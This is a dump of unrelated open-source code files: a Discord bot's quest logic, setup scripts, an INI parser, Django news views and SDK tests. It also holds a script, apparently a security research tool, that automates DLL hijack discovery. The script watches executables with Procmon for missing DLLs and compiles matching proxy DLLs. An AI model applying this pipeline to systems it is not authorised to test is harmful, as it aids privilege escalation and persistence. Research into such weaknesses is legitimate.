on this server!\")\n\n if base_accy < 1 or base_attack < 1 or base_strg < 1:\n raise util.DueUtilException(message.channel, \"No quest stats can be less than 1!\")\n\n if base_hp < 30:\n raise util.DueUtilException(message.channel, \"Base HP must be at least 30!\")\n\n if len(name) > 30 or len(name) == 0 or name.strip == \"\":\n raise util.DueUtilException(message.channel, \"Quest names must be between 1 and 30 characters!\")\n\n if given_spawn_chance < 1 or given_spawn_chance > 25:\n raise util.DueUtilException(message.channel, \"Spawn chance must be between 1 and 25%!\")\n\n self.server_id = message.server.id\n self.created_by = message.author.id\n else:\n self.server_id = extras.get('server_id', \"DEFAULT\")\n self.created_by = \"\"\n\n self.name = name\n super().__init__(self._quest_id(), **extras)\n self.task = extras.get('task', \"Battle a\")\n self.w_id = extras.get('weapon_id', weapons.NO_WEAPON_ID)\n self.spawn_chance = given_spawn_chance / 100\n self.image_url = extras.get('image_url', Quest.DEFAULT_IMAGE)\n self.base_attack = base_attack\n self.base_strg = base_strg\n self.base_accy = base_accy\n self.base_hp = base_hp\n self.channel = extras.get('channel', \"ALL\")\n self.times_beaten = 0\n self._add()\n self.save()\n\n def _quest_id(self):\n return self.server_id + '/' + self.name.lower()\n\n def _add(self):\n global quest_map\n if self.server_id != \"\":\n quest_map[self.id] = self\n\n def base_values(self):\n return self._BaseStats(self.base_attack, self.base_strg,\n self.base_accy, self.base_hp, )\n\n def get_channel_mention(self, server):\n if self.channel in (\"ALL\", \"NONE\"):\n return self.channel.title()\n else:\n channel = server.get_channel(self.channel)\n if channel is None:\n return \"``Deleted``\"\n else:\n return channel.mention\n\n @property\n def made_on(self):\n return self.server_id\n\n @property\n def creator(self):\n creator = 
players.find_player(self.created_by)\n if creator is not None:\n return creator.name\n else:\n return \"Unknown\"\n\n @property\n def q_id(self):\n return self.id\n\n @property\n def home(self):\n try:\n return util.get_client(self.server_id).get_server(self.server_id).name\n except AttributeError:\n return \"Unknown\"\n\n\nclass ActiveQuest(Player, util.SlotPickleMixin):\n __slots__ = [\"level\", \"attack\", \"strg\", \"hp\",\n \"equipped\", \"q_id\", \"quester_id\", \"cash_iv\",\n \"quester\", \"accy\", \"exp\", \"total_exp\"]\n\n def __init__(self):\n pass # Use async factory method create instead\n\n @staticmethod\n async def create(q_id: str, quester: Player):\n # The base quest (holds the quest information)\n active_quest = ActiveQuest()\n active_quest.q_id = q_id\n base_quest = active_quest.info\n\n active_quest.name = base_quest.name\n\n active_quest.quester_id = quester.id\n active_quest.quester = quester\n\n \"\"\" The quests equipped items.\n Quests only have weapons but I may add more things a quest\n can have so a default dict will help with that \"\"\"\n active_quest.equipped = defaultdict(lambda: \"default\",\n weapon=base_quest.w_id)\n\n target_exp = random.uniform(quester.total_exp, quester.total_exp*1.8)\n active_quest.level = gamerules.get_level_from_exp(target_exp)\n active_quest.total_exp = active_quest.exp = 0\n await active_quest._calculate_stats()\n quester.quests.append(active_quest)\n quester.save()\n return active_quest\n\n async def _calculate_stats(self):\n base_attack, base_strg, base_accy, base_hp = tuple(base_value / 1.7 for base_value in\n self.info.base_values())\n self.attack = self.accy = self.strg = 1\n target_level = self.level\n self.level = 0\n self.hp = base_hp * target_level * random.uniform(0.6, 1)\n increment_scale = random.uniform(0.4, 1)\n while self.level < target_level:\n exp_next_level = gamerules.get_exp_for_next_level(self.level)\n increment = max(exp_next_level, 1000) * increment_scale / 600\n if self.exp >= exp_next_level:\n self.level += 1\n self.exp = 0\n self.progress(increment * random.uniform(0.6, 1),\n increment * random.uniform(0.6, 1),\n increment * random.uniform(0.6, 1),\n max_attr=math.inf,\n max_exp=math.inf)\n self.attack += -increment + increment * base_attack\n self.strg += -increment + increment * base_strg\n self.accy += -increment + increment * base_accy\n await asyncio.sleep(1 / 1000)\n self.cash_iv = min(self.info.base_values()) * 3 * random.uniform(0.8, 1.6)\n\n def get_avatar_url(self, *args):\n quest_info = self.info\n if quest_info is not None:\n return quest_info.image_url\n\n def get_reward(self):\n base_reward = self.cash_iv * self.level\n return max(1, int(base_reward + base_reward * (self.get_quest_scale() + 1) * 10))\n\n def get_quest_scale(self):\n avg_stats = self.get_avg_stat()\n quest_weapon = self.weapon\n quester_weapon = self.quester.weapon\n hp_difference = (self.hp - self.quester.hp) / self.hp / 10\n stat_difference = (avg_stats - self.quester.get_avg_stat()) / avg_stats\n weapon_damage_difference = (quest_weapon.damage - quester_weapon.damage) / quest_weapon.damage\n weapon_accy_difference = (quest_weapon.accy - quester_weapon.accy) / quest_weapon.accy\n return (stat_difference * 10 + weapon_damage_difference\n / 3 + weapon_accy_difference * 5 + hp_difference * 5) / 20\n\n def get_threat_level(self, player):\n return [\n player.attack / max(player.attack, self.attack),\n player.strg / max(player.strg, self.strg),\n player.accy / max(player.accy, self.accy),\n self.money / max(player.money, 
self.money),\n player.weapon.damage / max(player.weapon.damage, self.weapon.damage)\n ]\n\n @property\n def money(self):\n return self.get_reward()\n\n @money.setter\n def money(self, value):\n pass\n\n @property\n def info(self):\n return quest_map[self.q_id]\n\n def save(self):\n pass\n\n def __setstate__(self, object_state):\n SlotPickleMixin.__setstate__(self, object_state)\n \"\"\" quester is set in the player's setstate\n as quests are part of the player's save.\n Also we don't want to inherit the Player setstate.\n \"\"\"\n self.equipped = defaultdict(self.DEFAULT_FACTORIES[\"equipped\"], **self.equipped)\n\n def __getstate__(self):\n object_state = SlotPickleMixin.__getstate__(self)\n del object_state[\"quester\"]\n object_state[\"equipped\"] = dict(object_state[\"equipped\"])\n return object_state\n\n\ndef get_server_quest_list(server: discord.Server) -> Dict[str, Quest]:\n return quest_map[server]\n\n\ndef get_quest_on_server(server: discord.Server, quest_name: str) -> Quest:\n return quest_map[server.id + \"/\" + quest_name.lower()]\n\n\ndef remove_quest_from_server(server: discord.Server, quest_name: str):\n quest_id = server.id + \"/\" + quest_name.lower()\n del quest_map[quest_id]\n dbconn.get_collection_for_object(Quest).remove({'_id': quest_id})\n\n\ndef get_quest_from_id(quest_id: str) -> Quest:\n return quest_map[quest_id]\n\n\ndef get_channel_quests(channel: discord.Channel) -> List[Quest]:\n return [quest for quest in quest_map[channel.server].values() if quest.channel in (\"ALL\", channel.id)]\n\n\ndef get_random_quest_in_channel(channel):\n if channel.server in quest_map:\n return random.choice(get_channel_quests(channel))\n\n\ndef add_default_quest_to_server(server):\n default = random.choice(list(quest_map[\"DEFAULT\"].values()))\n Quest(default.name,\n default.base_attack,\n default.base_strg,\n default.base_accy,\n default.base_hp,\n task=default.task,\n weapon_id=default.w_id,\n image_url=default.image_url,\n spawn_chance=default.spawn_chance * 100,\n server_id=server.id,\n no_save=True)\n\n\ndef remove_all_quests(server):\n if server in quest_map:\n result = dbconn.delete_objects(Quest, '%s/.*' % server.id)\n del quest_map[server]\n return result.deleted_count\n return 0\n\n\ndef has_quests(place):\n if isinstance(place, discord.Server):\n return place in quest_map and len(quest_map[place]) > 0\n elif isinstance(place, discord.Channel):\n if place.server in quest_map:\n return len(get_channel_quests(place)) > 0\n return False\n\n\nREFERENCE_QUEST = Quest('Reference', 1, 1, 1, 1, server_id=\"\", no_save=True)\n\n\ndef _load():\n def load_default_quests():\n with open('dueutil/game/configs/defaultquests.json') as defaults_file:\n defaults = json.load(defaults_file)\n for quest_data in defaults.values():\n Quest(quest_data[\"name\"],\n quest_data[\"baseAttack\"],\n quest_data[\"baseStrg\"],\n quest_data[\"baseAccy\"],\n quest_data[\"baseHP\"],\n task=quest_data[\"task\"],\n weapon_id=weapons.stock_weapon(quest_data[\"weapon\"]),\n image_url=quest_data[\"image\"],\n spawn_chance=quest_data[\"spawnChance\"],\n no_save=True)\n\n load_default_quests()\n\n for quest in dbconn.get_collection_for_object(Quest).find():\n loaded_quest = jsonpickle.decode(quest['data'])\n quest_map[loaded_quest.id] = util.load_and_update(REFERENCE_QUEST, loaded_quest)\n util.logger.info(\"Loaded %s quests\", 
len(quest_map))\n\n\n_load()\n","repo_name":"DueUtil/DueUtil","sub_path":"dueutil/game/quests.py","file_name":"quests.py","file_ext":"py","file_size_in_byte":11712,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"94"} +{"seq_id":"14499331101","text":"import setuptools\nimport shutil\nimport os\n\nown_dir = os.path.abspath(os.path.dirname(__file__))\n\n\ndef requirements():\n yield f'gardener-cicd-libs=={version()}'\n yield f'gardener-cicd-dso=={version()}'\n\n\ndef modules():\n return []\n return [\n os.path.basename(os.path.splitext(module)[0]) for module in\n os.scandir(path=own_dir)\n if module.is_file() and module.name.endswith('.py')\n ]\n\n\ndef version():\n d = own_dir\n while True:\n candidate = os.path.join(d, 'VERSION')\n if os.path.isfile(candidate):\n with open(candidate) as f:\n return f.read().strip()\n d = os.path.abspath(os.path.join(d, os.pardir))\n raise RuntimeError(f'did not find VERSION file in {own_dir} and all pardirs')\n\n\n# cp scripts\nsrc_bin_dir = os.path.join(own_dir, os.pardir, 'bin')\ntgt_bin_dir = os.path.join(own_dir, 'bin')\nshutil.copytree(src_bin_dir, tgt_bin_dir)\n\n\nsetuptools.setup(\n name='gardener-cicd-cli',\n version=version(),\n description='Gardener CI/CD Command Line Interface',\n python_requires='>=3.10',\n py_modules=modules(),\n packages=setuptools.find_packages(),\n install_requires=list(requirements()),\n scripts=[os.path.join(tgt_bin_dir, 'purge_history')],\n entry_points={\n 'console_scripts': [\n 'gardener-ci = gardener_ci.cli_gen:main',\n 'cli.py = gardener_ci.cli_gen:main', # XXX backwards-compatibilty - rm this\n 'yaml2json = gardener_ci.yaml2json:main'\n ],\n },\n)\n","repo_name":"gardener/cc-utils","sub_path":"cli/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"94"} +{"seq_id":"13286501557","text":"\"\"\"Manipulate MAME ini files\"\"\"\n# Lutris Modules\nfrom lutris.util.system import path_exists\n\n\nclass MameIni:\n\n \"\"\"Looks like an ini file and yet it is not one!\"\"\"\n\n def __init__(self, ini_path):\n if not path_exists(ini_path):\n raise OSError(\"File %s does not exist\" % ini_path)\n self.ini_path = ini_path\n self.lines = []\n self.config = {}\n\n def parse(self, line):\n \"\"\"Store configuration value from a line\"\"\"\n line = line.strip()\n if not line or line.startswith(\"#\"):\n return None, None\n key, *_value = line.split(maxsplit=1)\n if _value:\n return key, _value[0]\n return key, None\n\n def read(self):\n \"\"\"Reads the content of the ini file\"\"\"\n with open(self.ini_path, \"r\", encoding='utf-8') as ini_file:\n for line in ini_file.readlines():\n self.lines.append(line)\n print(line)\n config_key, config_value = self.parse(line)\n if config_key:\n self.config[config_key] = config_value\n\n def write(self):\n \"\"\"Writes the file to disk\"\"\"\n with open(self.ini_path, \"w\", encoding='utf-8') as ini_file:\n for line in self.lines:\n config_key, _value = self.parse(line)\n if config_key and self.config[config_key]:\n ini_file.write(\"%-26s%s\\n\" % (config_key, self.config[config_key]))\n elif config_key:\n ini_file.write(\"%s\\n\" % config_key)\n else:\n ini_file.write(line)\n","repo_name":"lutris/lutris","sub_path":"lutris/util/mame/ini.py","file_name":"ini.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":6962,"dataset":"github-code","pt":"94"} 
+{"seq_id":"15277053215","text":"#!/usr/bin/env python\r\n\r\n\"\"\"\r\nModule Docstring\r\n\"\"\"\r\n\r\nfrom http.server import executable\r\nfrom importlib.resources import path\r\nfrom os import makedirs\r\nfrom os.path import basename, isfile, join\r\nfrom re import sub\r\nfrom shutil import copyfile\r\n\r\nfrom logzero import DEBUG, logfile, logger, loglevel\r\nfrom pandas import DataFrame\r\nfrom core.compile import Compile\r\nfrom utils.generic import to_text_file\r\nfrom tqdm import tqdm\r\n\r\nfrom config import settings\r\nfrom core.monitor import FileWatcher\r\nfrom core.pe import ExtractPE\r\nfrom core.pmc import Procmon\r\nfrom core.strings import Strings\r\nfrom utils.argparse import argument_parser\r\nfrom utils.datasets import Dataset\r\nfrom utils.generic import (list_to_file, mkdir, path_to_file, to_df_csv,\r\n uniquify, search_extensions)\r\n\r\nimport pandas as pd\r\nimport operator\r\n\r\nlogfile(settings.LOG_FILE, maxBytes=settings.LOG_MAX_BYTES, backupCount=settings.LOG_BACKUP_COUNT)\r\nloglevel(settings.LOG_LEVEL)\r\n\r\nlogger.info(f\"Log are stored in: {settings.LOG_FILE}\")\r\n\r\ndef setup():\r\n args = argument_parser()\r\n if args.debug or settings.DEBUG_MODE:\r\n settings.DEBUG_MODE = True\r\n loglevel(DEBUG)\r\n logger.debug(\"Logger set to DEBUG\")\r\n\r\n # Make an unique output dir to prevent overwriting previous monitors\r\n app_outdir = mkdir(join(settings.OUTPUT_DIR, args.appname))\r\n\r\n if args.command == \"monitor\":\r\n logger.info(\"Entering monitor mode\")\r\n with FileWatcher(args.directory) as fw:\r\n fw.run()\r\n csvfile = to_df_csv(fw.__str__(), outdir, \"raw_monitoring_data\")\r\n\r\n with Dataset(csvfile) as ds:\r\n ds.overview()\r\n ds.dedupe_and_sort(key=\"fullpath\")\r\n ext_dict = ds.export_extension_lists(outdir)\r\n\r\n elif args.command == \"analyse\":\r\n logger.info(\"Entering analyse mode\")\r\n # for ext, fullpaths in ext_dict.items():\r\n # if ext.lower() == \"exe\":\r\n\r\n logger.warning(f\"Press CTRL+C to stop\")\r\n # install_dir = \"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\\"\r\n install_dir = args.installdir\r\n findings = []\r\n try: \r\n # Do this action ones at the very end (It take dayysssss) \r\n with ExtractPE(app_outdir) as ePE:\r\n if ePE.check_cache():\r\n logger.debug(\"Loading exports from cache\")\r\n dll_entries = ePE.load_cache()\r\n else: \r\n subfolders, libraries = search_extensions(install_dir, [\".dll\"])\r\n logger.info(f\"Found {len(libraries)} libraries in installation directory {install_dir}\")\r\n logger.info(\"Retrieving all export entries, this might take a while...\")\r\n dll_entries = ePE.list_exports(list(libraries))\r\n\r\n _, executables = search_extensions(install_dir, [\".exe\"])\r\n logger.info(f\"Found {len(executables)} executables in installation directory {install_dir}\")\r\n logger.info(\r\nf\"\"\"\r\nAutomated steps to discover potential DLL hijacks. 
Testing {len(executables)} items!!\r\n 1) Validate file \r\n 2) Generate Procmon filter\r\n 3) Copy the file to a temporary folder.\r\n 4) Open Procmon and apply the customized filter.\r\n 5) Run the applications.\r\n 6) Close Procmon and save the results.\r\n\"\"\")\r\n\r\n \r\n for target in executables:\r\n\r\n summary = {}\r\n # Executable filename.\r\n filename = path_to_file(target)\r\n\r\n if not isfile(target):\r\n logger.warning(f\"Skip: {target}\")\r\n continue\r\n if any(xs in target for xs in settings.SKIP_LIST):\r\n logger.warning(f\"Skip: {target}\")\r\n continue\r\n\r\n summary_outfile = join(app_outdir, filename, \"summary.csv\")\r\n if isfile(summary_outfile):\r\n continue\r\n\r\n # Executable custom outdir\r\n outdir = mkdir(uniquify(join(app_outdir, filename)))\r\n\r\n # Full path name of executable in custom outdir \r\n tmp_executable = join(outdir, filename)\r\n try:\r\n copyfile(target, tmp_executable)\r\n except PermissionError:\r\n continue\r\n\r\n summary.update(file=target)\r\n \r\n # with Strings(outdir) as strings:\r\n # summary.update(autoElevate=strings.find_elevated(target)) \r\n # summary.update(autoElevate=False)\r\n\r\n with Procmon(outdir) as pm: \r\n # Generate Procmon Filter\r\n filter = pm.generate_filter(tmp_executable)\r\n\r\n # The (filtered) CSV file with loaded DLL's in current directory \r\n procmon_output, df = pm.run(tmp_executable, filter)\r\n \r\n # Storing DLL paths located in the installation folder\r\n matching_files = []\r\n # Load CSV file containing the unloaded DLL's\r\n # df = pd.read_csv(procmon_output)\r\n # List all missing DLL's\r\n missing_dlls = [path_to_file(path.lower()) for path in df.Path.tolist()]\r\n summary.update(potentials=df.Path.tolist())\r\n \r\n # Match missing DLL's with a existing DLL located in the Install directory (based on name)\r\n for dll in dll_entries:\r\n low_fname = path_to_file(dll[\"file\"].lower())\r\n # The DLL is relevant as it is missing by the executables\r\n if low_fname in missing_dlls:\r\n # Do not add the same DLL twice if it is located in different directories.\r\n get_value = operator.itemgetter('file')\r\n files = map(get_value, matching_files)\r\n if not low_fname in '\\t'.join(list(files)):\r\n # Add if not listed yet\r\n matching_files.append(dll)\r\n\r\n summary.update(matches=matching_files)\r\n\r\n with Compile(outdir) as cp:\r\n # Store the potential successes\r\n potential_hijacks = []\r\n\r\n # variables stores 3 this\r\n # file: DLL fullpath and a tuple (dll export function, ordinal)\r\n for variables in matching_files:\r\n # Creating C code file and def code file with jinja2\r\n c_file, def_file = cp.setup(variables)\r\n # Compile time! 
Returns a filename is DLL is created without errors, None is failed\r\n compiled_dll = cp.build(variables[\"file\"], c_file, def_file)\r\n # Only append successfull builds ;-)\r\n if compiled_dll != None: \r\n potential_hijacks.append(compiled_dll)\r\n\r\n # logger.info(f\"{len(potential_hijacks)} potential DLL hijack is discovered {path_to_file(target)} : {potential_hijacks}\")\r\n summary.update(hijacks=potential_hijacks)\r\n to_text_file(summary, summary_outfile)\r\n\r\n findings.append(summary)\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n DataFrame.from_dict(findings, orient=\"index\").to_csv(join(outdir, \"results.txt\"))\r\n to_text_file(join(outdir, \"results.txt\"), findings)\r\n # if ext.lower() != 'dll' and ext.lower() != 'exe':\r\n # app_outdir = mkdir(join(outdir, ext))\r\n # fname = join(app_outdir, ext)\r\n # list_to_file(fullpaths, fname)\r\n else:\r\n logger.warning(\"Required command not found, check --help for more info.\")\r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n setup()\r\n except KeyboardInterrupt:\r\n logger.exception(\"Keyboard interrupt\")\r\n pass\r\n logger.info(f\"Exit gracefully\") \r\n","repo_name":"MrPineMan/HijackDiscovery","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33180697840","text":"\"\"\"\nthe View Model for trade info\n\"\"\"\nfrom app.view_models.book import BookViewModel\n\n\nclass TradeInfo:\n def __init__(self, goods):\n self.total = 0\n self.trades = []\n self.__parse(goods)\n\n def __parse(self, goods):\n self.total = len(goods)\n self.trades = [self.__map_to_trade(single) for single in goods]\n\n def __map_to_trade(self, single):\n time = single.create_datetime.strftime('%Y-%m-%d') if single.create_datetime else '未知'\n return dict(\n user_name=single.user.nickname,\n time=time,\n id=single.id\n )\n\n\nclass MyTrades:\n \"\"\"\n the base view model for my gifts or my wishes\n \"\"\"\n\n def __init__(self, trades_of_mine, re_trades_count_list):\n self.trades = []\n\n self.__trades_of_mine = trades_of_mine\n self.__re_trades_count_list = re_trades_count_list\n self.trades = self.__parse()\n\n def __parse(self):\n temp_trades = []\n for trade in self.__trades_of_mine:\n my_trade = self.__matching(trade)\n temp_trades.append(my_trade)\n return temp_trades\n\n def __matching(self, trade):\n count = 0\n for re_trade_count in self.__re_trades_count_list:\n if trade.isbn == re_trade_count['isbn']:\n count = re_trade_count['count']\n r = {\n 're_trades_count': count,\n 'book': BookViewModel(trade.book),\n 'id': trade.id\n }\n return r\n","repo_name":"shenghuntianlang/Fisher","sub_path":"app/view_models/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8457365220","text":"# 리스트 복사\na = [1, 2, 3]\nb = a\n\n# print(id(a)) # id: 변수가 가리키고 있는 객제의 주소 값 리턴\n# print(id(b))\n# print(a is b) # is: 동일한 객체를 가리키고 있는지 판단\n\na[1] = 4\n# print(a)\n# print(b)\n\n# a 변수의 값을 가져오면서 다른 주소를 가리키도록 하는 방법\n# 1. [:]이용\na = [1, 2, 3]\nb = a[:]\n# print(id(a))\n# print(id(b))\n\n# 2. 
copy 모듈 이용\nfrom copy import copy\na = [1, 2, 3]\nb = copy(a)\n# print(a is b) # False\n\n# 변수를 만드는 여러가지 방법\na, b = ('python', 'life')\nprint(a) # python (str)\nprint(b) # life (str)\n\n(a, b) = 'python', 'life'\n","repo_name":"junmin98/JumpToPython_practice","sub_path":"chap2/02-8_variable.py","file_name":"02-8_variable.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15316316379","text":"import json\nimport random\nimport unittest\nimport uuid\nfrom time import sleep\n\nfrom forge_sdk import ForgeConn\nfrom forge_sdk import utils\nfrom forge_sdk.protos import protos\nfrom test.lib import validate_response\n\nSLEEP_SECS = 1\nforge = ForgeConn('127.0.0.1:27210')\nrpc = forge.rpc\n\n\ndef verify_tx_response(response):\n if response.code == 0 and response.hash is not None:\n return True\n else:\n return False\n\n\nclass HelperRPCTest(unittest.TestCase):\n\n def setUp(self):\n self.wallet_type = protos.WalletType(pk=0, hash=1, address=1)\n self.alice = self.init_wallet('alice')\n self.mike = self.init_wallet('mike')\n self.trans_tx = utils.build_transfer_itx(to=self.alice.wallet.address,\n value=2)\n\n def init_wallet(self, moniker):\n res = rpc.create_wallet(\n wallet_type=self.wallet_type,\n moniker=moniker,\n passphrase='abc123',\n )\n return res\n\n def test_build_tx(self):\n nonce = random.randrange(1, 100)\n forge_built_tx = rpc.create_tx(self.trans_tx,\n self.alice.wallet.address,\n self.alice.wallet,\n self.alice.token,\n nonce=nonce)\n\n built_tx_1 = rpc.build_signed_tx(\n itx=self.trans_tx, wallet=self.alice.wallet,\n token=self.alice.token, nonce=nonce)\n\n built_tx_2 = rpc.build_signed_tx(itx=self.trans_tx,\n wallet=self.alice.wallet,\n nonce=nonce)\n\n assert forge_built_tx.tx.signature == built_tx_2.signature\n assert forge_built_tx.tx.signature == built_tx_1.signature\n\n @validate_response\n def test_send_transfer_tx(self):\n tx = rpc.build_signed_tx(itx=self.trans_tx, wallet=self.mike.wallet)\n res = rpc.send_tx(tx)\n return res\n\n def test_send_exchange_tx(self):\n res, asset_address = rpc.create_asset(type_url='test',\n asset=str(uuid.uuid1()),\n wallet=self.alice.wallet)\n assert utils.is_response_ok(res)\n sleep(5)\n asset = rpc.get_single_asset_state(asset_address)\n\n print('hash', res.hash)\n print('issuer', asset.issuer)\n print('alice', self.alice.wallet.address)\n\n assert (asset.issuer == self.alice.wallet.address)\n sender_info = protos.ExchangeInfo(assets=[asset_address])\n receiver_info = protos.ExchangeInfo(value=utils.int_to_biguint(10))\n exchange_tx = protos.ExchangeTx(sender=sender_info,\n receiver=receiver_info)\n tx = rpc.prepare_exchange(exchange_tx=exchange_tx,\n wallet=self.alice.wallet)\n tx = rpc.finalize_exchange(tx, self.mike.wallet)\n res = rpc.send_tx(tx)\n assert utils.is_response_ok(res)\n\n def test_asset_factory(self):\n # create asset_factory\n template = json.dumps({\n \"row\": \"{{ row }}\",\n \"seat\": \"{{ seat }}\",\n \"room\": \"5C\",\n \"time\": \"11:00am 04/30/2019\",\n \"name\": \"Avengers: Endgame\"\n })\n asset_attributes = protos.AssetAttributes(\n transferrable=True,\n ttl=3600,\n )\n\n factory = protos.AssetFactory(\n description='movie ticket factory' + str(uuid.uuid1()),\n limit=20,\n price=utils.value_to_biguint(5),\n template=template,\n allowed_spec_args=['row', 'seat'],\n asset_name='TestTicket',\n attributes=asset_attributes\n )\n\n res, factory_address = rpc.create_asset_factory(moniker='test_factory',\n 
asset=factory,\n wallet=self.alice.wallet)\n assert utils.is_response_ok(res)\n\n # send acquireAssetTx\n sleep(5)\n factory_state = rpc.get_single_asset_state(factory_address)\n assert factory_state.issuer == self.alice.wallet.address\n mike_original_balance = rpc.get_account_balance(\n self.mike.wallet.address)\n\n spec_datas = [{'row': '1', 'seat': str(uuid.uuid1())}, {\n 'row': '2', 'seat': str(uuid.uuid4())}]\n res, tickets = rpc.acquire_asset(to=factory_address,\n spec_datas=spec_datas,\n type_url='fg:x:test_ticket',\n proto_lib=protos,\n wallet=self.mike.wallet)\n print('tickets', tickets)\n assert res.code == 0\n assert len(tickets) == len(spec_datas)\n sleep(6)\n for ticket in tickets:\n res = rpc.get_single_asset_state(ticket)\n assert res\n assert res.issuer == self.alice.wallet.address\n assert res.owner == self.mike.wallet.address\n\n mike_new_balance = rpc.get_account_balance(self.mike.wallet.address)\n assert (mike_original_balance -\n mike_new_balance) == utils.to_unit(5) * 2\n","repo_name":"ArcBlock/forge-python-sdk","sub_path":"test/integration/advanced.py","file_name":"advanced.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"36929576069","text":"from django.shortcuts import render, redirect\nfrom django.urls.base import reverse\nfrom .models import News, Category\nfrom .forms import NewsForm, CategoryForm\n\ndef main_page(request):\n eng_news = News.objects.filter().order_by(\"-views\")\n search = request.GET.get(\"soz\", None)\n if request.method == \"GET\" and search != None :\n news = News.objects.filter(titele__contains=search).order_by(\"-id\")\n context = { \n \"news\":news,\n \"eng_kop\": eng_news\n }\n return render(request, \"index.html\", context)\n else:\n news = News.objects.all().order_by(\"-id\")\n context = { \n \"news\":news,\n \"eng_kop\": eng_news\n }\n return render(request, \"index.html\", context)\n\ndef category_page(request, cat_id):\n news = News.objects.filter(category=cat_id)\n context = { \n \"news\":news\n }\n return render(request, \"index.html\", context)\n\ndef batafsil_page(request, id):\n news = News.objects.get(id=id)\n news.views+=1\n news.save()\n context = {\n \"news\": news, \n }\n return render(request, \"batafsil.html\", context)\n\ndef add_news_page(request):\n form = NewsForm()\n if request.method == \"POST\":\n form = NewsForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect(reverse(\"home-page\"))\n context = {\n \"form\": form\n } \n return render(request, \"add_news.html\", context)\n\ndef add_category(request):\n form = CategoryForm()\n if request.method == \"POST\":\n form = CategoryForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(reverse(\"home-page\"))\n context = {\n \"form\": form\n } \n return render(request, \"add_category.html\", context)\n\ndef admin_page(request):\n news = News.objects.filter()\n context = {\n \"news\": news\n }\n return render(request, \"admin.html\", context)\n\ndef del_news(request, news_id):\n news = News.objects.get(id=news_id)\n if news:\n news.delete()\n return redirect(reverse(\"admin-page\"))\n\ndef news_holati(request, news_id):\n news = News.objects.get(id=news_id)\n if news_id and news.holati==True:\n news.holati = False\n news.save()\n elif news_id and news.holati==False:\n news.holati = True\n news.save()\n return 
redirect(reverse(\"admin-page\"))\n","repo_name":"akbarmuminjanov/News","sub_path":"test_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17552693608","text":"import time\n\nimport cv2\n\nfrom SensorModule import SensorModule\nfrom EmotionModule import EmotionModule\nfrom ResponseModule import ResponseModule\nfrom ActionModule import ActionModule\n\nimport ArduinoCommunicator\n\nimport sys\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nimport os\n\nimport logging\n\n# video\n#VIDEO_FEED = os.path.expanduser('~/Desktop/ishaanMovies/people gesturing-converted.mp4')\n#VIDEO_FEED = os.path.expanduser('~/Desktop/ishaanMovies/morePeople-converted.mp4')\n# camera\nFRONT_CAMERA = 0\nBACK_CAMERA = 1\n\nTEST_WIHOUT_RASP = False\n\nclass AppRun(QWidget):\n\n def __init__(self, realRun=None):\n super(AppRun, self).__init__()\n self.setWindowTitle('Cat\\'s Cradle')\n self.move(0, 0)\n self.realRun = realRun\n\n self.loadingDialog = None\n\n closeBtn = QPushButton('Stop CatsCradle')\n closeBtn.clicked.connect(self.initShutdown)\n layout = QGridLayout(self)\n layout.addWidget(closeBtn, 1, 1)\n\n self.setupStep = 0\n\n def closeEvent(self, event):\n self.initShutdown()\n event.accept() # let the window close\n\n def setup(self):\n # Raise message boxes to make sure the user properly sets the marionette\n # before running the AI\n setupDialog = QMessageBox()\n setupDialog.setText(\"Cat's Cradle Setup\")\n setupDialog.setStandardButtons(QMessageBox.Ok | QMessageBox.Close)\n setupDialog.setDefaultButton(QMessageBox.Ok)\n\n setupDialog.setInformativeText(\"Power on Raspberry Pi, \\nwait 1 minute\\n\");\n ret = setupDialog.exec_();\n if ret == QMessageBox.Close:\n return False\n\n if not TEST_WIHOUT_RASP:\n # Wait for 60\n delay = 60\n if \"--testUI\" in sys.argv:\n delay = 5\n progress = QProgressDialog(\"Starting Raspberry Pi...\", None, 0, delay)\n progress.setWindowModality(Qt.WindowModal)\n\n for i in range(0, delay):\n progress.setValue(i)\n if (progress.wasCanceled()):\n return False\n time.sleep(1)\n\n progress.setValue(delay);\n\n # Try port connection and warn user if failed\n self.ac = ArduinoCommunicator.ArduinoCommunicator(\"/dev/ttyUSB0\")\n if self.ac.serial_port is None:\n errorDialog = QMessageBox()\n errorDialog.setText(\"ERROR\")\n errorDialog.setIcon(QMessageBox.Critical)\n errorDialog.setInformativeText(\"Port not found.\\nMake sure the Raspberry Pi is connected to the right port\\n\")\n errorDialog.setStandardButtons(QMessageBox.Ok)\n errorDialog.setDefaultButton(QMessageBox.Ok)\n errorDialog.exec_()\n if not \"--testUI\" in sys.argv:\n return False\n\n self.setupStep = 1\n\n setupDialog.setInformativeText(\"If necessary, plug main camera into battery\\n\");\n ret = setupDialog.exec_();\n if ret == QMessageBox.Close:\n return False\n\n self.setupStep = 2\n\n setupDialog.setInformativeText(\"Power on motors and rear camera\\n\");\n ret = setupDialog.exec_();\n if ret == QMessageBox.Close:\n return False\n\n self.setupStep = 3\n\n return True\n\n\n def initShutdown(self):\n if self.realRun:\n self.realRun.stop()\n\n\n def shutdown(self):\n # Raise message boxes to make sure the user properly shuts down the marionette\n shutdownDialog = QMessageBox()\n shutdownDialog.setText(\"Cat's 